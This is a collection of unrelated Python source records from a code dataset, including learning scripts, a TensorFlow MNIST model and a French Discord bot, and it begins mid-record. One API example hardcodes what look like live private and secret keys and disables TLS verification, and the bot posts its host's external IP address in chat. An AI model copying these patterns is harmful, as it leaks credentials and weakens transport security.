(numbers only):\\n'\r\n '' % chosen_location\r\n))\r\nprint('')\r\n\r\n#3\r\nchosen_unit_of_distance = input(\r\n 'Enter the unit of distance you chose\\n'\r\n 'ex - miles, feet, kilometers:\\n'\r\n ''\r\n)\r\nprint('')\r\n\r\n#4\r\ntime_to_location = float(input(\r\n 'Enter the time it takes to travel\\n'\r\n 'to %s in whatever unit of measurement\\n'\r\n 'that you want (numbers only):\\n'\r\n '' % chosen_location\r\n))\r\nprint('')\r\n\r\n#5\r\nchosen_unit_of_time = input(\r\n 'Enter the unit of time you chose\\n'\r\n 'ex- seconds, minutes, hours:\\n'\r\n ''\r\n)\r\nprint('')\r\n\r\n# These next 2 lines convert any input into miles and hours, and then MPH\r\ndistance_to_location_in_miles = (distance_key_feet[chosen_unit_of_distance] * distance_to_location) / 5280\r\ntime_to_location_in_hours = time_key_hours[chosen_unit_of_time] * time_to_location\r\nmph_to_location = distance_to_location_in_miles / time_to_location_in_hours\r\ndays_to_the_moon = (238900 / mph_to_location) / 24\r\ndays_to_mars = (33900000 / mph_to_location) / 24\r\n\r\nprint('%s is %s miles from your home' % (chosen_location, distance_to_location_in_miles))\r\nprint('')\r\nprint('it takes you %s hours to get there' %time_to_location_in_hours)\r\nprint('')\r\nprint('you travel to %s at an average speed of %s mph' %(chosen_location, mph_to_location))\r\nprint('')\r\nprint('it would take you %s days to travel to the moon at that speed,' % days_to_the_moon)\r\nprint('and %s days to get to mars!' % days_to_mars)\r\n\r\n","sub_path":"unit1.py","file_name":"unit1.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"538846978","text":"#동명이인을 찾는 알고리즘\n\n#두 번 이상 나온 이름 찾기\n#입력 : 이름이 n개 들어 있는 리스트\n#출력 : 이름 n개 중 반복되는 이름의 집합\n\ndef find_same_name(a):\n n = len(a) #리스트의 자료 개수를 n에 저장\n result = set() #결과를 저장할 빈 집합\n for i in range(0, n-1): #0부텉 n-2까지 반복하는데 a[n-1]은 이미 앞에서 비교함\n for j in range(i + 1, n):\n if a[i] == a[j]:\n result.add(a[i])\n return result\n\nname = [\"Tom\", \"Jerry\", \"Mike\", \"Tom\"]\nprint(find_same_name(name))\nname2 = [\"Tom\", \"Jerry\", \"Mike\", \"Tom\", \"Mike\"]\nprint(find_same_name(name2))\n\n#알고리즘 분석\n#0번 이름은 n-1번 비교 ~ n-1번 이름은 0번 비교\n#전체 횟수는 0번부터 n-1번 까지 합 => 1에서 n까지 합\n#n(n-1)/2 -> O(n^2) 빅오표기\n","sub_path":"1_기초/samename.py","file_name":"samename.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"7352984","text":"import numpy as np\ndef my_sigmoid(x, deriv = False):\n\tif(deriv==True):\n\t\treturn x*(1-x)\n\treturn 1/(1+np.exp(-x))\nnp.random.seed(1)\n\n#x一共有两位数据,分别是:工作日与否,雨天与否\n#y一共有两位数据,分别是:借车数,还车数\nx = np.array([[1,0],[1,0],[1,0],[1,1],[1,0],[0,0],[0,1]])\ny = np.array([[27,31],[28,27],[28,30],[12,11],[30,26],[18,13],[8,7]])\ntest = np.array([[1,0],[1,0],[1,0],[1,1],[1,0],[0,0],[0,1]])\nsyn0 = 2*np.random.random((2,4))-1\nsyn1 = 2*np.random.random((4,3))-1\nsyn2 = 2*np.random.random((3,2))-1\nrate = 0.1\nfor j in range(1000):\n L0 = x\n L1 = my_sigmoid(np.dot(L0,syn0))\n L2 = my_sigmoid(np.dot(L1,syn1))\n L3 = np.dot(L2,syn2)\n L3_error = y - L3 \n L3_delta = L3_error\n L2_error = L3_delta.dot(syn2.T)\n L2_delta = L2_error*my_sigmoid(L2,deriv = True)\n L1_error = L2_delta.dot(syn1.T)\n L1_delta = L1_error*my_sigmoid(L1,deriv = True)\n if(j%100 == 0):\n rate = rate / 2\n syn2 += rate*np.dot(L2.T,L3_delta)\n syn1 += rate*np.dot(L1.T,L2_delta)\n syn0 += rate*np.dot(L0.T,L1_delta)\n\nMy_result_1 = my_sigmoid(np.dot(test,syn0))\nMy_result_2 = my_sigmoid(np.dot(My_result_1,syn1))\nMy_result = np.dot(My_result_2,syn2)\n\nprint(My_result)\n","sub_path":"Mathematical_Modeling/code/BP/BP.py","file_name":"BP.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"48929547","text":"from discord import Colour\n\n# all factions recognised by BB\nfactions = [\"terran\", \"vossk\", \"midorian\", \"nivelian\", \"neutral\"]\n# all factions useable in bounties\nbountyFactions = [\"terran\", \"vossk\", \"midorian\", \"nivelian\"]\n\n# levels of security in SolarSystems (SolarSystem security is stored as an index in this list)\nsecurityLevels = [\"secure\", \"average\", \"risky\", \"dangerous\"]\n\n# map image URLS for cmd_map\nmapImageWithGraphLink = \"https://cdn.discordapp.com/attachments/700683544103747594/700683693215318076/gof2_coords.png\"\nmapImageNoGraphLink = 'https://i.imgur.com/TmPgPd3.png'\n\n# icons for factions\nfactionIcons = {\"terran\": \"https://cdn.discordapp.com/attachments/700683544103747594/711013574331596850/terran.png\",\n \"vossk\": \"https://cdn.discordapp.com/attachments/700683544103747594/711013681621893130/vossk.png\",\n \"midorian\": \"https://cdn.discordapp.com/attachments/700683544103747594/711013601019691038/midorian.png\",\n \"nivelian\": \"https://cdn.discordapp.com/attachments/700683544103747594/711013623257890857/nivelian.png\",\n \"neutral\":\n \"https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/rocket_1f680.png\",\n \"void\": \"https://cdn.discordapp.com/attachments/700683544103747594/711013699841687602/void.png\"}\n\nerrorIcon = \"https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/exclamation-mark_2757.png\"\nwinIcon = \"https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/trophy_1f3c6.png\"\nrocketIcon = \"https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/rocket_1f680.png\"\n\n# colours to use in faction-related embed strips\nfactionColours = { \"terran\": Colour.gold(),\n \"vossk\": Colour.dark_green(),\n \"midorian\": Colour.dark_red(),\n \"nivelian\": Colour.dark_blue(),\n \"neutral\": Colour.purple()}\n\n# Data representing all ship items in the game. These are used to create bbShip objects,\n# which are stored in builtInShipObjs in a similar dict format.\n# Ships to not have tech levels in GOF2, so tech levels will be automaticaly generated\n# for the sake of the bot during bot.on_ready.\nbuiltInShipData = {}\n\n# Data representing all module items in the game. These are used to create bbModule objects,\n# which are stored in builtInModuleObjs in a similar dict format.\nbuiltInModuleData = {}\n\n# Data representing all primary weapon items in the game. These are used to create bbWeapon objects,\n# which are stored in builtInWeaponObjs in a similar dict format.\nbuiltInWeaponData = {}\n\n# Data representing all ship upgrades in the game. These are used to create bbShipUpgrade objects,\n# which are stored in builtInUpgradeObjs in a similar dict format.\nbuiltInUpgradeData = {}\n\n# data for builtIn criminals to be used in Criminal.fromDict\n# criminals marked as not builtIn to allow for dictionary init.\n# The criminal object is then marked as builtIn during bot.on_ready\nbuiltInCriminalData = {}\n\n# data for builtIn systems to be used in SolarSystem.fromDict\nbuiltInSystemData = {}\n\n# data for builtIn Turrets to be used in bbTurret.fromDict\nbuiltInTurretData = {}\n\n# data for builtIn commodities to be used in bbCommodity.fromDict (unimplemented)\nbuiltInCommodityData = {}\n\nbuiltInToolData = {}\n\n# data for builtIn secondaries to be used in bbSecondary.fromDict (unimplemented)\nbuiltInSecondariesData = {}\n\n# data for builtIn ShipSkins to be used in ShipSkin.fromDict\nbuiltInShipSkinsData = {}\n\n\n# Objects representing all ship skins in the game.\nbuiltInShipSkins = {}\nbuiltInToolObjs = {}\n# To be populated during bot.on_ready\n# These dicts contain item name: item object for the object described in the variable name.\n# This is primarily for use in their relevent fromDict functions.\nbuiltInSystemObjs = {}\nbuiltInCriminalObjs = {}\nbuiltInModuleObjs = {}\nbuiltInWeaponObjs = {}\nbuiltInUpgradeObjs = {}\nbuiltInTurretObjs = {}\n\n# References to the above item objects, sorted by techLevel.\nshipKeysByTL = []\nmoduleObjsByTL = []\nweaponObjsByTL = []\nturretObjsByTL = []\n\n\n# names of criminals in builtIn bounties\nbountyNames = {}\n# the length of the longest criminal name, to be used in padding during cmd_bounties\nlongestBountyNameLength = 0\n","sub_path":"bot/cfg/bbData.py","file_name":"bbData.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"229777272","text":"import requests\nimport json\nimport nacl.encoding\nimport nacl.signing\nimport nacl.secret\n\napi_key_id = '747b0fb0-1f25-4c45-af94-50d487af15f1'\napi_key_private_key = 'e6e71d12eaade92994a915fa5ecfd54223e53d72e02cfc73bc2b968a061eea7e'\napi_key_secret_key = '1a74783f7429b95b64483f910019d3559f7f1da429fcc1a2e187880e938d611c'\nserver_url = 'https://browserplugins.chickahoona.com/server'\nserver_public_key = '02da2ad857321d701d754a7e60d0a147cdbc400ff4465e1f57bc2d9fbfeddf0b'\nserver_signature = '4ce9e761e1d458fe18af577c50eb8249a0de535c9bd6b7a97885c331b46dcbd1'\n\n\nSSL_VERIFY = False\n\n\ndef api_request(method, endpoint, data = None):\n\n headers = {'content-type': 'application/json'}\n\n r = requests.request(method, server_url + endpoint, data=data, headers=headers, verify=SSL_VERIFY)\n\n return r.json()\n\ndef api_read_secret(secret_id):\n\n method = 'POST'\n endpoint = '/api-key-access/secret/'\n\n data = json.dumps({\n 'api_key_id': api_key_id,\n 'secret_id': secret_id,\n })\n\n encrypted_secret = api_request(method, endpoint, data)\n\n # decrypt step 1: Decryption of the encryption key\n crypto_box = nacl.secret.SecretBox(api_key_secret_key, encoder=nacl.encoding.HexEncoder)\n encryption_key = crypto_box.decrypt(nacl.encoding.HexEncoder.decode(encrypted_secret['secret_key']),\n nacl.encoding.HexEncoder.decode(encrypted_secret['secret_key_nonce']))\n\n # decrypt step 2: Decryption of the secret\n crypto_box = nacl.secret.SecretBox(encryption_key, encoder=nacl.encoding.HexEncoder)\n decrypted_secret = crypto_box.decrypt(nacl.encoding.HexEncoder.decode(encrypted_secret['data']),\n nacl.encoding.HexEncoder.decode(encrypted_secret['data_nonce']))\n\n return json.loads(decrypted_secret)\n\ndef main():\n\n secret_id = 'c81d0cff-65f9-4f81-9815-dbe2850331c9'\n\n decrypted_secret = api_read_secret(secret_id)\n\n print(decrypted_secret)\n\n\nif __name__ == '__main__':\n main()","sub_path":"examples/api_key_without_session.py","file_name":"api_key_without_session.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"496876362","text":"'''\nimport PyPDF2 as pyPdf\n\nfilename = \"intro_to_envi.pdf\";\npdf = pyPdf.PdfFileReader(open(filename, \"rb\"))\ni = -1;\nfor page in pdf.pages:\n i = i + 1;\n print(\"---Page \", i, \":--------------------------------\");\n print (page.extractText())\n \n input(\"Press Enter to continue...\")\n \n'''\n\nimport textract\nimport shutil\nfrom cStringIO import StringIO\nimport os\n\n######################\n## Find all pdfs\n#########################\nsource_root = \"inputs\";\ndone_root = \"done\";\noutput_root = \"inputs\";\ndoc_list = [];\ni = -1;\nfor afile in os.listdir(source_root):\n if afile.endswith(\".pdf\") or afile.endswith(\".epub\"):\n i = i+1;\n doc_list.append(afile);\n #print(file)\n#print (pdf_list);\n#exit();\n\n\ndef convert_doc_to_txt(path):\n text = textract.process(path);\n return text\n\ndef move_doc_to_done(source_path, done_path):\n result = shutil.move(source_path, done_path);\n return result;\n \n######################\n## Convert all pdfs\n#########################\nprint(\"\\n\");\nprint(\"Converting all docs...\");\nfor file_name in doc_list:\n #file_name = \"lonely_planet.pdf\";\n source_path = source_root + \"/\" + file_name;\n done_path = done_root + \"/\" + file_name;\n print (\" -- Converting \" + source_path);\n text = convert_doc_to_txt(source_path);\n #print(text);\n\n f = open(output_root+\"/\"+file_name[0:-4]+'.text', 'w+')\n f.write(text); # python will convert \\n to os.linesep\n f.close() # you can omit in most cases as the destructor will call it\n\n #print (\" -- Moving it to \" + done_path);\n #move_doc_to_done(source_path, done_path);\n\n","sub_path":"feature_engineering/preprocess_input/sense2vec/doc_to_txt.py","file_name":"doc_to_txt.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"379122118","text":"import tensorflow as tf\nimport numpy as np\nimport NNutils\nimport mnist\nfrom datetime import datetime\nimport flags\nclass Network():\n def __init__(self, layers = [400, 200, 100], regul=False, bn=False, droprate=.0):\n self.batch_size = 128\n self.learning_rate = 0.001\n self.global_step = tf.Variable(0, trainable=False)\n\n self.x = tf.placeholder(\"float32\", [None, 28 * 28 * 1])\n self.y = tf.placeholder(\"float32\", [None, 10])\n\n self.droprate_train = droprate\n self.droprate_test = 0.0\n self.droprate_ph = tf.placeholder(\"float\")\n\n self.layers = layers\n self.train_list = []\n\n self.activation = \"relu\"\n self.network = \"mlp\"\n\n #정규화 관련 변수\n if regul == True:\n self.regularize = 0.001\n self.regularizer = tf.contrib.layers.l2_regularizer(self.regularize)\n self.network += \"_regul\"\n else:\n self.regularizer = None\n\n if bn == True:\n self.batch_normalization = True\n self.network += \"_bn\"\n else:\n self.batch_normalization = False\n\n def fc_layer(self, x, output_num, activation, dropout):\n if activation == 'relu':\n activation = tf.nn.relu\n elif activation == 'sigmoid':\n activation = tf.nn.sigmoid\n elif activation == 'tanh':\n activation = tf.nn.tanh\n else:\n activation == None\n\n output = tf.layers.dense(x, output_num, activation=activation,\n kernel_initializer=tf.random_normal_initializer(stddev=0.01),\n kernel_regularizer=self.regularizer)\n output = tf.nn.dropout(output, 1 - dropout)\n\n y = output\n return y\n\n def info(self):\n layers_sum = str(sum(self.layers))\n layers_num = str(len(self.layers))\n dropout = str(self.droprate_train)\n return self.network + \"-\" + self.activation + \"-\" + layers_num + \"-\" + layers_sum + \"-d\" + dropout\n\n def model(self, x): #[3072, 450, 300, 200, 100, 50, 10]\n layers = self.layers\n image_size = 32\n output = x\n reshape_size = 0\n\n layer_num = 0\n\n for layer in layers:\n layer_num += 1\n with tf.variable_scope('fc' + str(layer_num)):\n if self.batch_normalization == True:\n output = tf.layers.batch_normalization(output)\n # output = fc_layer('fc', output, layer, activation=self.activation, dropout=self.dropout_normal)\n output = self.fc_layer(output, layer, activation=self.activation, dropout=self.droprate_ph)\n with tf.variable_scope('fc'):\n output = tf.contrib.layers.fully_connected(output, 10, activation_fn=None)\n\n y = output\n return y\n\n def train(self):\n\n #learning rate\n with tf.name_scope(\"learning_rate\"):\n learning_rate = tf.train.exponential_decay(0.001,\n self.global_step,\n (50000 / self.batch_size) * 10,\n 0.95, staircase=True)\n learning_rate = tf.maximum(0.0001, learning_rate)\n tf.summary.scalar(\"learning_rate\", learning_rate)\n\n #model\n y_ = self.model(self.x)\n\n #cost and training\n with tf.name_scope(\"cost\"):\n self.loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=y_, labels=self.y))\n\n #정규항 추가\n if self.regularizer != None:\n reg_variables = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n reg_term = tf.contrib.layers.apply_regularization(self.regularizer, reg_variables)\n self.loss += reg_term\n\n self.training = tf.train.AdamOptimizer(learning_rate=learning_rate). \\\n minimize(self.loss, global_step=self.global_step)\n\n tf.summary.scalar(\"loss\", self.loss)\n\n with tf.name_scope(\"accuracy\"):\n compare = tf.equal(tf.argmax(self.y, 1), tf.argmax(y_, 1))\n self.accuracy = tf.reduce_mean(tf.cast(compare, \"float\"))\n\n tf.summary.scalar(\"accuarcy\", self.accuracy)\n\n def run(self, step_limit):\n self.train()\n\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n\n dataset = mnist.read_data_sets(flags.MNIST_DIR, one_hot=True)\n train_data, train_label, test_data, test_label = dataset.train.images, dataset.train.labels, \\\n dataset.test.images, dataset.test.labels\n\n test_indices = np.arange(len(test_data))\n np.random.shuffle(test_indices)\n test_indices = test_indices[0:1000]\n name = self.info()\n path = \"mnist/\" + str(step_limit) + name\n saver = NNutils.save(path, sess)\n writer, writer_test, merged = NNutils.graph(path, sess)\n\n step = sess.run(self.global_step)\n while step < step_limit:\n print(\"step :\", step)\n for start, end in zip(range(0, len(train_data), self.batch_size),\n range(self.batch_size, len(train_data), self.batch_size)):\n summary, \\\n _, loss, \\\n step = sess.run([merged,\n self.training, self.loss,\n self.global_step],\n feed_dict={self.x: train_data[start:end],\n self.y: train_label[start:end],\n self.droprate_ph: self.droprate_train})\n\n if step % 50 == 0:\n writer.add_summary(summary, step)\n print(step, datetime.now(), loss)\n\n summary, \\\n loss, \\\n accuracy = sess.run([merged, self.loss, self.accuracy],\n feed_dict={self.x: test_data,\n self.y: test_label,\n self.droprate_ph: self.droprate_test})\n\n writer_test.add_summary(summary, step)\n print(\"test results : \", accuracy, loss)\n saver.save(sess, path + \"/\" + name + \".ckpt\", step)\n\nif __name__ == \"__main__\":\n model = Network(regul=False, bn=False, droprate=0.5)\n model.run(100000)","sub_path":"ANN/RW/mnist_mlp.py","file_name":"mnist_mlp.py","file_ext":"py","file_size_in_byte":6612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"499951129","text":"import discord, sys, asyncio, re, random, os, time, platform, socket, psutil, cpuinfo\nfrom discord.ext import commands\nimport random\nfrom requests import get\nfrom discord.ext.commands import Bot\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\nbot = commands.Bot(command_prefix='!')\nbot.remove_command(\"help\")\n\ndef reload_bot():\n python = sys.executable\n os.execl(python, python, * sys.argv)\n\ndef command_logs(cmd_str, author, message):\n print (bcolors.WARNING + (time.strftime(\"%d/%m/%Y %H:%M:%S\")) + \n bcolors.ENDC, \":\", bcolors.WARNING + (\"{}\").format(author.name) + \n bcolors.ENDC, \"a éxécuté la commande\", bcolors.WARNING + (cmd_str)\n + bcolors.ENDC, \"avec succès sur le serveur : \", bcolors.WARNING + \n message.server.name + bcolors.ENDC)\n\ndef command_logs_critics(cmd_str, author, message):\n print (bcolors.WARNING + (time.strftime(\"%d/%m/%Y %H:%M:%S\")) + \n bcolors.ENDC, \":\", bcolors.WARNING + (\"{}\").format(author.name) + bcolors.ENDC, \n bcolors.FAIL + \"a éxécuté la commande\" + bcolors.ENDC, bcolors.WARNING + (cmd_str) + \n bcolors.ENDC, bcolors.FAIL + \"sans y être autorisé.\" + bcolors.ENDC, \"sur le serveur : \", \n bcolors.WARNING + message.server.name + bcolors.ENDC)\n\n\n@bot.event\nasync def on_ready():\n print (bcolors.OKGREEN + (time.strftime(\"%d/%m/%Y %H:%M:%S :\")), \n (\"Connexion de {} avec l'id {}\").format(bot.user.name, bot.user.id) + bcolors.ENDC)\n \n em = discord.Embed(title='Le bot a redémarré', \n description=(\"Nous nous éfforçons de continuellement améliorer le bot,\\n\"\n \"ce redémarrage est pour nous le seul moyen pour mettre a jour Franky.\\n\"\n \"Nous sommes désolés pour les désagréments.\"), colour=0x43b581)\n\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(bot.get_channel('310127519753830400'), embed=em)\n await bot.change_presence(game=discord.Game(name=\"rien\"))\n await bot.change_presence(game=discord.Game(name=\"!help | BETA v1.0\"))\n\n@bot.event\nasync def on_member_join(member):\n server = member.server\n server_name = server.name\n em = discord.Embed(title='Bienvenue sur le serveur, ' + member.name, \n description=\"**!help** pour avoir de l'aide !\", colour=0x3498db)\n\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(server.default_channel, embed=em)\n \n print (bcolors.WARNING + (time.strftime(\"%d/%m/%Y %H:%M:%S\")) + bcolors.ENDC, \":\", \n bcolors.WARNING + (\"{}\").format(member.name) + \n bcolors.ENDC, \"s'est connecté avec succès sur le serveur : \", \n bcolors.WARNING + server_name + bcolors.ENDC)\n\n@bot.event\nasync def on_member_remove(member):\n server = member.server\n server_name = server.name\n em = discord.Embed(title=member.name + ' a quitté le serveur..', colour=0xe74c3c)\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(server.default_channel, embed=em)\n \n print (bcolors.WARNING + (time.strftime(\"%d/%m/%Y %H:%M:%S\")) + bcolors.ENDC, \":\", \n bcolors.WARNING + (\"{}\").format(member.name) + \n bcolors.ENDC, \"a quitté le serveur\", bcolors.WARNING + (\":(\") + \n bcolors.ENDC, \"avec succès sur le serveur : \", \n bcolors.WARNING + server_name + bcolors.ENDC)\n\n@bot.event\nasync def on_server_join(server):\n member = server.me\n server_name = server.name\n em = discord.Embed(title='Bonjour, je suis Franky !', \n description=(\"N'oubliez pas de me donner un rôle ayant les droits d'administration,\"\n \" ou je ne pourrai rien faire pour vous aider..\"), colour=0x43b581)\n await bot.send_message(server.default_channel, embed=em)\n\n@bot.event\nasync def on_command_error(error, ctx):\n cmd_str = \"inconnue\"\n message = ctx.message\n channel = ctx.message.channel\n member = ctx.message.author\n author = member\n if isinstance(error, commands.CommandNotFound):\n em = discord.Embed(title=member.name + ', je ne connais pas cette commande.. ', colour=0xe74c3c)\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(channel, embed=em)\n print (bcolors.WARNING + (time.strftime(\"%d/%m/%Y %H:%M:%S\")) + \n bcolors.ENDC, \":\", bcolors.WARNING + (\"{}\").format(author.name) + \n bcolors.ENDC, \"a éxécuté une commande\", bcolors.WARNING + (cmd_str)\n + bcolors.ENDC, \"sur le serveur : \", bcolors.WARNING + \n message.server.name + bcolors.ENDC)\n\n@bot.command(pass_context=True)\nasync def botsysteminfo(ctx):\n cmd_str = \"!botsysteminfo\"\n message = ctx.message\n await bot.send_typing(message.channel)\n author = message.author\n extIP = get('https://ipapi.co/ip/').text\n networkAdress = socket.gethostbyname(socket.gethostname())\n currentUsageCPU = psutil.cpu_percent()\n pid = os.getpid()\n py = psutil.Process(pid)\n currentRamUsage = py.memory_info()[0]/2.**30\n os_uname = os.uname()\n info = cpuinfo.get_cpu_info()\n info_cpu = info['brand']\n from psutil import virtual_memory\n mem = virtual_memory()\n mem_total = mem.total\n mem_total = mem_total / 1000000000\n st = psutil.disk_usage('/')\n st = st.total / 1000000000\n disk_used = psutil.disk_usage('/')\n disk_used = disk_used.used / 1000000000\n \n em = discord.Embed(title='Informations sur le serveur du bot :', \n description=(\"**Configuration matérielle du serveur :**\\n\"\n \"Processeur : **{}**\\n\"\n \"Mémoire RAM : **{}**Gb\\n\"\n \"Capacité totale du disque : **{}**Gb\\n\"\n \"Le serveur du bot est hébergé par **Amazon USA Ouest (Oregon)**\\n\\n\"\n \"**Utilisation actuelle du serveur :**\\n\"\n \"L'utilisation actuelle du processeur est de **{}**%\\n\"\n \"L'utilisation actuelle de la RAM est de **{}**Gb\\nL'utilisation du disque et de : **{}**Gb\\n\"\n \"L'adresse IP du serveur du bot est **{}**\").format(info_cpu, round(mem_total, 2), round(st, 2), currentUsageCPU, \n round(currentRamUsage, 3), round(disk_used, 2), extIP), colour=0x3498db)\n\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n command_logs(cmd_str, author, message)\n\n@bot.command(pass_context=True)\nasync def help(ctx):\n cmd_str = \"!help\"\n message = ctx.message\n author = message.author\n \n em = discord.Embed(title='Liste des commandes :', \n description=(\"**!messages_count** : Savoir combien de messages vous avez sur le channel \\n\"\n \"**!clear** : Nettoie le channel **(doit être éxécutée par un admin)** \\n\"\n \"**!askfranky** : Vous répond Oui, Non ou Peut-être de manière aléatoire \\n\"\n \"**!botsysteminfo** : Donne des informations sur le système du bot\\n\"\n \"**!gitbot** : Envoi un lien vers le répertoire GitHub du bot\\n\"\n \"**!admincall** : Appelles un admin **(a utiliser uniquement en cas de besoin réel !)**\\n\"\n \"**!ping** : Vous donne le temps de latence entre le serveur du bot et Google France\\n\"\n \"**!frankyonmyserver** : Vous permet d'ajouter Franky sur votre serveur !\"), colour=0x3498db)\n \n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n command_logs(cmd_str, author, message)\n\n@bot.command(pass_context=True)\nasync def messages_count(ctx):\n cmd_str = \"message_count\"\n message = ctx.message\n author = message.author\n server = author.server\n counter = 0\n async for log in bot.logs_from(message.channel, limit=100):\n if log.author == message.author:\n counter += 1\n counter = str(counter)\n em = discord.Embed(title=author.name + ' vous avez écrit ' + counter + ' messages dans ce salon.', colour=0x3498db)\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(server, embed=em)\n command_logs(cmd_str, author, message)\n\n@bot.command(pass_context=True)\nasync def reload(ctx):\n cmd_str = \"!reload\"\n message = ctx.message\n author = message.author\n if author.id == '213683309530710016':\n if author.server_permissions.administrator == True:\n command_logs(cmd_str, author, message)\n await reload_bot()\n else:\n \n em = discord.Embed(title=\"Vous n'êtes pas autorisé a faire cela !\", \n description=\"Seuls les administrateurs peuvent lancer cetter commande.\", colour=0xe74c3c)\n\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n command_logs_critics(cmd_str, author, message)\n \n em2 = discord.Embed(title=message.author.name + \" a tenté d'éxécuter la commande **!reload** dans #\" + \n message.channel.name, colour=0xf39c12)\n\n em2.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(discord.Object(\"313829118011506690\"), embed=em2)\n else:\n \n em = discord.Embed(title=\"Vous n'êtes pas autorisé a faire cela !\", \n description=\"Seul le créateur du bot peut lancer cette commande.\", colour=0xe74c3c)\n\n em3 = discord.Embed(title=message.author.name + \" a tenté d'éxécuter la commande **!reload** dans #\" + \n message.channel.name + \" sur le serveur : \" + message.server.name, colour=0xf39c12)\n\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n await bot.send_message(discord.Object(\"313829118011506690\"), embed=em3)\n\n@bot.command(pass_context=True)\nasync def clear(ctx):\n cmd_str = \"!clear\"\n message = ctx.message\n author = message.author\n server = author.server\n channel = discord.utils.get(server.channels, name='administration_bot')\n channel_str = str(channel)\n if channel_str == \"administration_bot\":\n channel_id = channel.id\n if author.server_permissions.administrator == True:\n counter = 0\n tmp = await bot.say('Nettoyage des messages...')\n await asyncio.sleep(5)\n async for msg in bot.logs_from(message.channel):\n counter += 1\n await bot.delete_message(msg) \n \n em = discord.Embed(title='Nettoyage terminé', \n description=(\"{} messages ont été supprimés dans ce salon.\".format(counter)), colour=0x43b581)\n\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n command_logs(cmd_str, author, message)\n\n else:\n \n em2 = discord.Embed(title=\"Vous n'êtes pas autorisé a faire cela !\", \n description=\"Seuls les administrateurs peuvent lancer cetter commande.\", colour=0xe74c3c)\n\n command_logs_critics(cmd_str, author, message)\n\n em2.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em2)\n \n em3 = discord.Embed(title=message.author.name + \" a tenté d'éxécuter la commande **!clear** dans #\" + \n message.channel.name, colour=0xf39c12)\n\n em3.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(discord.Object(channel_id), embed=em3)\n else:\n em2 = discord.Embed(title=\"Vous n'êtes pas autorisé a faire cela !\", \n description=\"Seuls les administrateurs peuvent lancer cetter commande.\", colour=0xe74c3c)\n\n command_logs_critics(cmd_str, author, message)\n\n em2.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em2)\n \n em2 = discord.Embed(title=\"Salon d'administration non trouvé..\", \n description=(\"Le bot a besoin d'un salon **administration_bot** pour fonctionner correctement..\\n\"\n \"Si vous en avez déjà créé un, vérifier que vous l'avez bien orthographié. \"), colour=0xe74c3c)\n em2.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em2)\n\n@bot.command(pass_context=True)\nasync def askfranky(ctx):\n cmd_str = \"!askfranky\"\n message = ctx.message\n author = message.author\n server = author.server\n await bot.send_typing(message.channel)\n await asyncio.sleep(5)\n options = [\"Oui\",\"Non\",\"Peut-être\"]\n option = random.choice(options)\n em = discord.Embed(title=option, colour=0x3498db)\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(server, embed=em)\n command_logs(cmd_str, author, message)\n\n@bot.command(pass_context=True)\nasync def gitbot(ctx):\n cmd_str = \"!gitbot\"\n message = ctx.message\n author = message.author\n server = author.server\n \n em = discord.Embed(title=\"Voici le répertoire GitHub du bot, n'oubliez pas de donner crédits si vous en faite usage..\", \n description='[Répertoire GitHub : SrOw_bot par SrOw](https://github.com/VinCySrOw/SrOw_bot)', colour=0x3498db)\n\n em.set_author(name='GitHub', icon_url=\"https://github.com/fluidicon.png\")\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n 